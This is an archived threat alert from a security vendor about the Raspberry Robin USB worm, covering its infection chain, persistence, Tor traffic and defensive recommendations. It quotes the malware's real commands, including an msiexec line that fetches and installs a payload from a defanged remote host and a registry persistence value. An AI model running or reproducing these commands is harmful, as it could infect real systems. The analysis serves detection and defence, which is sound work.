{
	"id": "4488b60e-2568-4a55-a278-56f51d91ec5d",
	"created_at": "2026-04-06T00:15:16.731229Z",
	"updated_at": "2026-04-10T13:12:28.642691Z",
	"deleted_at": null,
	"sha1_hash": "bc2cc197268c2cebd90962b5c0ed8d49f1943587",
	"title": "THREAT ALERT: Raspberry Robin Worm Abuses Windows Installer and QNAP Devices",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2309678,
	"plain_text": "THREAT ALERT: Raspberry Robin Worm Abuses Windows\r\nInstaller and QNAP Devices\r\nBy Cybereason Global SOC Team\r\nArchived: 2026-04-05 20:06:34 UTC\r\nThe Cybereason Global Security Operations Center (SOC) Team issues Cybereason Threat Alerts to inform\r\ncustomers of emerging impacting threats. The Alerts summarize these threats and provide practical\r\nrecommendations for protecting against them.\r\nWhat's Happening?\r\nThe Cybereason team is investigating a series of recent infections with the Raspberry Robin campaign, also\r\nassociated with the name “LNK Worm.” Raspberry Robin involves a worm that spreads over USB devices or\r\nshared folders, leveraging compromised QNAP (Network Attached Storage or NAS) devices as stagers. It uses an\r\nold but still effective method of using “LNK” shortcut files to lure its victims.\r\nKey Observations\r\nRaspberry Robin is a spreading threat, using specifically crafted Microsoft links (LNK files) to infect its\r\nvictims. Cybereason observed delivery through file archives, removable devices (USB) or ISO files.\r\nRaspberry Robin is a persistent threat. Once the malware infects a machine, it establishes persistence by\r\nrunning at every system startup.\r\nCybereason observed a majority of the victims being located in Europe.\r\nThe Cybereason Defense Platform detects and prevents Raspberry Robin activities\r\nAnalysis\r\nThis section describes the different processes that we observed, involved in Raspberry Robin infections. The\r\nfollowing diagram represents the overall malicious activity seen in a Raspberry Robin infection chain:\r\nhttps://www.cybereason.com/blog/threat-alert-raspberry-robin-worm-abuses-windows-installer-and-qnap-devices\r\nPage 1 of 12\n\nSummarized infection process for Raspberry Robin\r\nThe GSOC team summarizes a Raspberry Robin infection as follows :\r\nThe Raspberry Robin-related infections start from two files present in the same directory hosted on an\r\nexternal device or shared drive: \r\na “LNK” file that contains a Windows shell command \r\nanother file that acts as a “BAT” file, filled with padding data and two specific commands\r\nRaspberry Robin leverages the LOLBin called “msiexec.exe” to download and execute a malicious shared\r\nlibrary (DLL) from a compromised NAS device from the vendor “QNAP”.\r\nTo make it harder to detect, Raspberry Robin:\r\nleverages process injections in three legitimate Windows system processes\r\ncommunicates with the rest of Raspberry Robin’s infrastructure through Tor (The Onion Router)\r\nExit nodes \r\nTo persist on the infected system, Raspberry Robin uses a registry key to automatically load a malicious\r\nmodule through the Windows binary “rundll32.exe”, at the machine startup.\r\nInfection Process\r\nBased on public samples we analyzed (i.e. MD5 hash 22531e030b05dbaafe9932b8779c73f6), the initial set of two\r\nfiles can be present on an external storage device or simply in a compressed archive. It contains: \r\nA LNK file (i.e. “USB Drive.lnk”), which is the initial infection trigger, and contains the first “cmd.exe”\r\nexecution, such as C:\\Windows\\System32\\cmd.exe\" /r tYPE xPhfK.Usb|CmD.\r\nAnother file, xPhfK.Usb, which contains random binary data as well as two commands: explorer.exe\r\nADATA uFD and mSIExEC /Q -I\"hTTP://u0[.]pm:8080/80wOpGuotSU/USER-PC?admin\" “ to\r\ndownload and execute a second attack stage:\r\nhttps://www.cybereason.com/blog/threat-alert-raspberry-robin-worm-abuses-windows-installer-and-qnap-devices\r\nPage 2 of 12\n\nExample content of the public sample 22531e030b05dbaafe9932b8779c73f6\r\nProcess cmd.exe taking content of “WYcZ.CFg” file as an input to execute “process msiexec.exe” as seen in the\r\nCybereason Defense Platform\r\nThe fact that the initial “cmd.exe” spawns from the “explorer.exe” process is the result of “LNK” files execution.\r\nDownload and Execute \r\nThe initial infection vector launches “msiexec.exe” with a full malicious URL as an argument as well as “[/-]q”\r\n(quiet mode) and “[/-]i” (normal installation mode). Amongst the different attacks observed, the arguments are\r\nordered differently and use different patterns, for example with or without a space. \r\nAn example pattern for this command is: \r\nmsIEXeC -Q/i \"\"htTP://6y[.]RE:8080/5CBniie70Rw/[Machine name]=[Victim user name]\" (where the\r\nmachine name and victim name are replaced by actual values).\r\nAs the normal installation proceeds, the msiexec.exe command listed above creates another msiexec.exe /V\r\nprocess, launched from services.exe. \r\nThis second msiexec.exe /V process then spawns a third msiexec.exe process, which loads a malicious module\r\nnamed msi[...].tmp and is the malware stage downloaded from its parent msiexec.exe /V process:\r\nhttps://www.cybereason.com/blog/threat-alert-raspberry-robin-worm-abuses-windows-installer-and-qnap-devices\r\nPage 3 of 12\n\nProcess “msiexec.exe” downloading content from the domain “6y[.]re” pointing to a QNAP compromised device\r\nas seen in the Cybereason Defense Platform \r\nhttps://www.cybereason.com/blog/threat-alert-raspberry-robin-worm-abuses-windows-installer-and-qnap-devices\r\nPage 4 of 12\n\nExtract from “https://www.shodan.io/host/195.158.67.252”, showing that the server that resolves from “6y[.]re”\r\nis a QNAP device with a service hosted on TCP port 8080\r\nSpread Through Process Injection \r\nThe next step for this threat is to inject itself into other processes, namely “rundll32.exe,” “dllhost.exe” and\r\n“regsvr32.exe” on the observed victims. The Cybereason Defense Platform detects this injection and can help to\r\nlink the creator process and the created ones. \r\nThe number of injected system processes is generally high (between 50 and 300) and some of these processes\r\ncommunicate with TOR (The Onion Router) exit nodes:\r\nhttps://www.cybereason.com/blog/threat-alert-raspberry-robin-worm-abuses-windows-installer-and-qnap-devices\r\nPage 5 of 12\n\nRaspberry Robin injecting system processes, which then communicate with TOR-related IP addresses, as seen in\r\nthe Cybereason Defense Platform\r\nPersistence\r\nRaspberry Robin installs itself into a registry “run” key in the Windows user’s hive, for example:\r\n“Hku\\[GUID]\\software\\microsoft\\windows\\currentversion\\runonce\\vayp” with value “RUNDLL32\r\nSHELL32.DLL,ShellExec_RunDLLA REGSVR32.EXE /u -S \"C:\\Users\\\r\n[UserName]\\AppData\\Local\\Temp\\cnsbi.mh.\"\r\n As a result, “rundll32.exe” loads the same DLL as the one which the initial “msiexec.exe” process downloaded in\r\nthe infection stage. It then proceeds with the same process injection and communication as described above. \r\nThe loaded DLL has a random extension (pi.loc, cr.mf, etc.) and “rundll32.exe” loads it with a “.” at the end:\r\nhttps://www.cybereason.com/blog/threat-alert-raspberry-robin-worm-abuses-windows-installer-and-qnap-devices\r\nPage 6 of 12\n\nProcess tree showing the persistence mechanisms used by Raspberry Robin as seen in the Cybereason Defense\r\nPlatform\r\nRegarding the persistence aspects, the following diagram represents the way the malicious module executes at\r\neach machine startup:\r\nRaspberry Robin persistence process following an initial infection and running at each machine boot\r\nAs the malicious module is the same one as during the initial infection process, it displays the same malicious\r\nactivities involving process injection and communication with Tor exit nodes.\r\nThis module contains specific indicators, including the fact that it masquerades as an Apache shared library (DLL)\r\ncalled “libapriconv-1.dll”:\r\nhttps://www.cybereason.com/blog/threat-alert-raspberry-robin-worm-abuses-windows-installer-and-qnap-devices\r\nPage 7 of 12\n\nRaspberry Robin leverages malicious module loading masquerading as Apache shared libraries (DLL)\r\nThe other samples the GSOC team identified on other Raspberry Robin cases also use different masquerading\r\nprocesses (for instance, impersonating “QT 5”). \r\nThis specific module is also peculiar due to the fact that the chain of certification is broken, making it signed but\r\nnot verified by the Windows system. The code signing name is “OmniContact” and can be used as a filter on\r\nVirusTotal.com to check for similar samples.\r\nhttps://www.cybereason.com/blog/threat-alert-raspberry-robin-worm-abuses-windows-installer-and-qnap-devices\r\nPage 8 of 12\n\nExcerpt from virustotal.com showing a sample detailed information \r\nIn 75% of the observed victims, the malicious module downloaded by Raspberry Robin was signed by\r\n“OmniContact.”\r\nNetwork Communications\r\nFinally, the victim devices of Raspberry Robin created a high amount of network packets to TOR exit nodes. The\r\nGSOC team observed that the TCP ports used were 80, 443 and 8080.\r\nCybereason Recommendations\r\nhttps://www.cybereason.com/blog/threat-alert-raspberry-robin-worm-abuses-windows-installer-and-qnap-devices\r\nPage 9 of 12\n\nThe Cybereason Defense Platform detects and prevents Raspberry Robin infections in Microsoft products.\r\nCybereason recommends the following:\r\nBlock outgoing connections (outside of the organization) to TOR-related addresses, as Raspberry Robin\r\nactively communicates with TOR exit nodes.\r\nAs Raspberry Robin displays persistence mechanisms and establishes many masquerading actions on the\r\ninfected system, re-image infected devices.\r\nThreat Hunting with Cybereason: The Cybereason MDR team provides its customers with custom hunting\r\nqueries for detecting specific threats - to find out more about threat hunting and Managed Detection and\r\nResponse with the Cybereason Defense Platform, contact a Cybereason Defender here.\r\nFor Cybereason customers: More details available on the NEST including custom threat hunting\r\nqueries for detecting this threat:\r\nThe Cybereason Defense Platform detects Raspberry Robin initial access method\r\nThe Cybereason Defense Platform detects the Raspberry Robin malicious module loading\r\nIndicators of Compromise (IOCs)\r\nLooking for the IOCs? Open the chatbot on the bottom right corner of your screen to access the Raspberry Robin\r\nIOCs.\r\nAbout the Researcher\r\nhttps://www.cybereason.com/blog/threat-alert-raspberry-robin-worm-abuses-windows-installer-and-qnap-devices\r\nPage 10 of 12\n\nLoïc Castel, Principal Security Analyst, Cybereason Global SOC\r\nLoïc Castel is a Principal Security Analyst with the Cybereason Global SOC team. Loïc analyses and researches\r\ncritical incidents and cybercriminals, in order to better detect compromises. In his career, Loïc worked as a\r\nsecurity auditor in well-known organizations such as ANSSI (French National Agency for the Security of\r\nInformation Systems) and as Lead Digital Forensics \u0026 Incident Response at Atos. Loïc loves digital forensics and\r\nincident response, but is also interested in offensive aspects such as vulnerability research.\r\nAbout the Author\r\nCybereason Global SOC Team\r\nhttps://www.cybereason.com/blog/threat-alert-raspberry-robin-worm-abuses-windows-installer-and-qnap-devices\r\nPage 11 of 12\n\nThe Cybereason Global SOC Team delivers 24/7 Managed Detection and Response services to customers on\r\nevery continent. Led by cybersecurity experts with experience working for government, the military and multiple\r\nindustry verticals, the Cybereason Global SOC Team continuously hunts for the most sophisticated and pervasive\r\nthreats to support our mission to end cyberattacks on the endpoint, across the enterprise, and everywhere the battle\r\nmoves.\r\nAll Posts by Cybereason Global SOC Team\r\nSource: https://www.cybereason.com/blog/threat-alert-raspberry-robin-worm-abuses-windows-installer-and-qnap-devices\r\nhttps://www.cybereason.com/blog/threat-alert-raspberry-robin-worm-abuses-windows-installer-and-qnap-devices\r\nPage 12 of 12",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.cybereason.com/blog/threat-alert-raspberry-robin-worm-abuses-windows-installer-and-qnap-devices"
	],
	"report_names": [
		"threat-alert-raspberry-robin-worm-abuses-windows-installer-and-qnap-devices"
	],
	"threat_actors": [],
	"ts_created_at": 1775434516,
	"ts_updated_at": 1775826748,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/bc2cc197268c2cebd90962b5c0ed8d49f1943587.pdf",
		"text": "https://archive.orkl.eu/bc2cc197268c2cebd90962b5c0ed8d49f1943587.txt",
		"img": "https://archive.orkl.eu/bc2cc197268c2cebd90962b5c0ed8d49f1943587.jpg"
	}
}